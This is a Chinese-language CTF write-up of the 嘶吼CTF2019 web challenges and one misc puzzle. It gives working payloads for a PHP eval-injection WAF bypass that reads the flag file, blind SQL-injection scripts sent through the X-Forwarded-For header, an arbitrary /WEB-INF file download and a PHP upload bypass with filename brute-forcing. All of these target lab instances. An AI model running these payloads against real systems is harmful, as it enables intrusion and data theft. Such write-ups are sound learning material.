嘶吼CTF2019总结(Web部分题目复现以及部分杂项)

easy calc

这次的比赛自己一题都没有做出来，赛后看题解的时候很难受，其实有很多东西自己其实是可以做出来的，但是思路被限制了，可能这就是菜吧。

首先web题目就是一个easy calc，emmmmmmm。想一想当初De1CTF2019的那道计算器。脑子头大.但是这一题是没有那么难。

首先打开网页是一个简单的提交页面。

这里面是提交到calc.php这个文件中,这里面有一个坑，就是要想看到源码，必须要不提交数据(但是我就没有看出这一点导致后面的路越来越难走，以至放弃)。

获取源码

我们去掉num提交试试

<?php

error_reporting(0);

if(!isset($_GET['num'])){

    show_source(__FILE__);

}else{

        $str = $_GET['num'];

        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];

        foreach ($blacklist as $blackitem) {

                if (preg_match('/' . $blackitem . '/m', $str)) {

                        die("what are you want to do?");

                }

        }

        eval('echo '.$str.';');

}

?>

我.......

这个规则其实很好绕的,他过滤了空格制表符 \r \n 单双引号反单引号 [ ] 还有$和 \ 和 ^，然后直接拼进了eval里面。
但是我们可以利用eval执行多条语句，简单的pyload?num=1;phpinfo()就可以执行了。没有单双引号，我们可以利用chr(xx).chr(xx) 来构造字符串。

fuzz测试

但是并没有这么简单，我们发现当提交不合格的数据的时候，服务器会返回一个错误。

这个很可能是因为有waf设备在保护着(IPS/IDS等等),这里面利用了php的特性来进行绕过。

原理

当我们提交?%20num=1;xxx的时候。防护设备检测的是num。不是%20num。但是传入php的时候，php又会将前面的空格去掉。因此可以绕过waf检测。

payload

执行phpinfo()

?%20num=1;phpinfo()

列举根目录

?%20num=1;print_r(scandir(chr(47))) //47是"/"的ascii值

发现flag文件f1agg

读取

？%20num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))[readme](media/15713976592966/readme.md)

后记

还看到有人用http请求走私做的，我太菜了，没有复现成功。

很可惜，没有做出来，失望也好，后悔也罢，记住这次的教训就行了。

Online Proxy(最可惜的一道题)

现在想一想还很难受，这道题原本就快做出来了，但是。。。。

此题虽然说是Online Proxy，并且题目内容也给人一种是ssrf的假象，但是这道题是一个sql注入题，还是xff的注入！！

注入的原理:

查看源码的时候,会发现有一个current和last_ip,这里面是sql注入的。

说实话这个sql注入的原理是有点绕的，我表达能力不好，这里面就希望各位去尝试了，这里面是单引号的注入，没有任何过滤，需要查看前后两次的回显进行比较。

这里面直接给个脚本。

import requests

import re

import os

flag=""

url="http://node3.buuoj.cn:28540/"

for test in range(1,100) :

    low=0

    high=128

    while low<=high:

        mid=(low+high)//2

        header={"X-Forwarded-For":"0' or (ascii(substr((select  group_concat(schema_name) from information_schema.schemata ),{},1))>{}) or '0".format(str(test),str(mid)),"Cookie":"track_uuid=ae937590-4ac9-4719-bf6f-f49ab4f42506"}

        Mikasa=requests.get(url,headers=header)

        header={"X-Forwarded-For":"0' or (ascii(substr((select  group_concat(schema_name) from information_schema.schemata ),{},1))>{}) or '00".format(str(test),str(mid)),"Cookie":"track_uuid=ae937590-4ac9-4719-bf6f-f49ab4f42506"}

        Mikasa=requests.get(url,headers=header)

        Mikasa=requests.get(url,headers=header)

        if "Last Ip: 1" in Mikasa.text :

            low=mid+1

        else :

            high=mid-1

    flag+=chr(int(low+high+1)//2)

    print(flag)

注入表名

import requests

import re

import os

flag=""

url="http://node3.buuoj.cn:28540/"

for test in range(1,100) :

    low=0

    high=128

    while low<=high:

        mid=(low+high)//2

        header={"X-Forwarded-For":"0' or (ascii(substr((select  group_concat(table_name) from information_schema.tables where table_schema=0x46346c395f4434743442343565 ),{},1))>{}) or '0".format(str(test),str(mid)),"Cookie":"track_uuid=ae937590-4ac9-4719-bf6f-f49ab4f42506"}

        Mikasa=requests.get(url,headers=header)

        header={"X-Forwarded-For":"0' or (ascii(substr((select  group_concat(table_name) from information_schema.tables where table_schema=0x46346c395f4434743442343565),{},1))>{}) or '00".format(str(test),str(mid)),"Cookie":"track_uuid=ae937590-4ac9-4719-bf6f-f49ab4f42506"}

        Mikasa=requests.get(url,headers=header)

        Mikasa=requests.get(url,headers=header)

        if "Last Ip: 1" in Mikasa.text :

            low=mid+1

        else :

            high=mid-1

    flag+=chr(int(low+high+1)//2)

    print(flag)

注入字段名

import requests

import re

import os

flag=""

url="http://node3.buuoj.cn:28540/"

for test in range(1,100) :

    low=0

    high=128

    while low<=high:

        mid=(low+high)//2

        header={"X-Forwarded-For":"0' or (ascii(substr((select  group_concat(column_name) from information_schema.columns where table_schema=0x46346c395f4434743442343565 and table_name=0x46346c395f7434623165),{},1))>{}) or '0".format(str(test),str(mid)),"Cookie":"track_uuid=ae937590-4ac9-4719-bf6f-f49ab4f42506"}

        Mikasa=requests.get(url,headers=header)

        header={"X-Forwarded-For":"0' or (ascii(substr((select  group_concat(column_name) from information_schema.columns where table_schema=0x46346c395f4434743442343565 and table_name=0x46346c395f7434623165),{},1))>{}) or '00".format(str(test),str(mid)),"Cookie":"track_uuid=ae937590-4ac9-4719-bf6f-f49ab4f42506"}

        Mikasa=requests.get(url,headers=header)

        Mikasa=requests.get(url,headers=header)

        if "Last Ip: 1" in Mikasa.text :

            low=mid+1

        else :

            high=mid-1

    flag+=chr(int(low+high+1)//2)

    print(flag)

出flag了QAQ

import requests

import re

import os

flag=""

url="http://node3.buuoj.cn:28540/"

for test in range(1,100) :

    low=0

    high=128

    while low<=high:

        mid=(low+high)//2

        header={"X-Forwarded-For":"0' or (ascii(substr((select  group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e),{},1))>{}) or '0".format(str(test),str(mid)),"Cookie":"track_uuid=ae937590-4ac9-4719-bf6f-f49ab4f42506"}

        Mikasa=requests.get(url,headers=header)

        header={"X-Forwarded-For":"0' or (ascii(substr((select  group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e),{},1))>{}) or '00".format(str(test),str(mid)),"Cookie":"track_uuid=ae937590-4ac9-4719-bf6f-f49ab4f42506"}

        Mikasa=requests.get(url,headers=header)

        Mikasa=requests.get(url,headers=header)

        if "Last Ip: 1" in Mikasa.text :

            low=mid+1

        else :

            high=mid-1

    flag+=chr(int(low+high+1)//2)

    print(flag)

Easy Java

这一题确实有点坑，还有点脑洞。。

弱口令
首先这个登录框其实是一个弱口令admin::admin888

但是登录之后并没有什么有用的信息。

只有一张图片

任意文件下载

回到登录框发现有帮助，是一个任意文件下载，但是并非是get型的(这是一个坑)。

修改为POST型之后，先下载/WEB-INF/web.xml文件看一下结构..

之后发现存在flag控制器

下载/WEB-INF/classes/com/wm/ctf/FlagController.class获取flag

后记:一般对于java的web工程，.class文件都是放在/WEB-INF下的classes文件下面。

simple upload

这道题目用的是thinkphp来写的，但是自己没有怎么学过thinkphp,难受。

以下是源代码。

<?php

namespace Home\Controller;

use Think\Controller;

class IndexController extends Controller

{

    public function index()

    {

        show_source(__FILE__);//显示源码

    }

    public function upload()//

    {

        $uploadFile = $_FILES['file'];

        if (strstr(strtolower($uploadFile['name']), ".php") ) {

            return false;

        }

        $upload = new \Think\Upload();// 实例化上传类，未加参数会导致所有的文件都会上传(即整个文件数组都会上传)

        $upload->maxSize  = 4096 ;// 设置附件上传大小

        $upload->allowExts  = array('jpg', 'gif', 'png', 'jpeg');// 设置附件上传类型

        $upload->rootPath = './Public/Uploads/';// 设置附件上传目录

        $upload->savePath = '';// 设置附件上传子目录

        $info = $upload->upload() ;

        if(!$info) {// 上传错误提示错误信息

          $this->error($upload->getError());

          return;

        }else{// 上传成功 获取上传文件信息

          $url = __ROOT__.substr($upload->rootPath,1).$info['file']['savepath'].$info['file']['savename'] ;

          echo json_encode(array("url"=>$url,"success"=>1));

        }

    }

}

看一下规则吧,这里面来说吧，这里面实例化upload上传类的时候会发现没有加入任何的参数，如果没有加任何的参数会导致文件数组里面的东西都会被上传进去。

并且这里面只判断了$_FILES['file']的后缀，另外
\$upload->allowExts = array('jpg', 'gif', 'png', 'jpeg');// 设置附件上传类型这个是有问题的,在upload类里面限定后缀的是\$upload->exts()

所以我们上传的时候就可以上传文件数组绕过，并且上传的默认命名规则是
array('uniqid','')，所以上传后的文件名很相近，我们爆破后三位就行了。

脚本

# -*- coding: utf-8 -*-

import requests

import os

import re

url="http://6c3b26e6-55f3-45b7-a09f-3b847a1d362a.node3.buuoj.cn/index.php?s=Home/index/upload"

file={"file":open("./1.txt","r"),"file233":open("1.php","r")}

proxies={"http":"http://127.0.0.1:8080"}

Mikasa=requests.post(url,files=file)

print(Mikasa.text)

result=Mikasa.text.split("/")[-1].split(".")[0]#上传后的文件名

Sabre=int(result,16)

while 1 :

    Sabre=Sabre+1

    os=requests.session()

    Saber_test=str(hex(Sabre)).split("0x")[1]

    url_test="http://6c3b26e6-55f3-45b7-a09f-3b847a1d362a.node3.buuoj.cn/Public/Uploads/2019-10-22/{}.php".format(Saber_test)

    print(url_test)

    try :

        oss=os.get(url_test,timeout=1)

    except :

        pass

    #print(oss.text)

    if oss.status_code !=404 :

        print(url_test)

        exit()

        break

dict

Go语言的题目，太菜了，不会。

黄金6年(杂项)

涉及的Linux的命令(当然也可以用win上的工具)

strings

base64

hexdump

首先使用strings查看一下基础的信息。

strings 黄金6年

在末尾发现有base64的密文。

UmFyIRoHAQAzkrXlCgEFBgAFAQGAgADh7ek5VQIDPLAABKEAIEvsUpGAAwAIZmxhZy50eHQwAQADDx43HyOdLMGWfCE9WEsBZprAJQoBSVlWkJNS9TP5du2kyJ275JzsNo29BnSZCgMC3h+UFV9p1QEfJkBPPR6MrYwXmsMCMz67DN/k5u1NYw9ga53a83/B/t2G9FkG/IITuR+9gIvr/LEdd1ZRAwUEAA==

base64解密一下

echo "UmFyIRoHAQAzkrXlCgEFBgAFAQGAgADh7ek5VQIDPLAABKEAIEvsUpGAAwAIZmxhZy50eHQwAQADDx43HyOdLMGWfCE9WEsBZprAJQoBSVlWkJNS9TP5du2kyJ275JzsNo29BnSZCgMC3h+UFV9p1QEfJkBPPR6MrYwXmsMCMz67DN/k5u1NYw9ga53a83/B/t2G9FkG/IITuR+9gIvr/LEdd1ZRAwUEAA==" | base64 -D

还是很模糊那就用16进制加上ascii看一看吧。

可以看出这是个rar文件，还是有密码的，密码应该就藏在视频里面。

PS:密码就是视频里面，是四个二维码，需要逐帧观看(最后一个藏的真深)

tankgame(这是个逆向题目吧)

其他的都太难了，撤了撤了。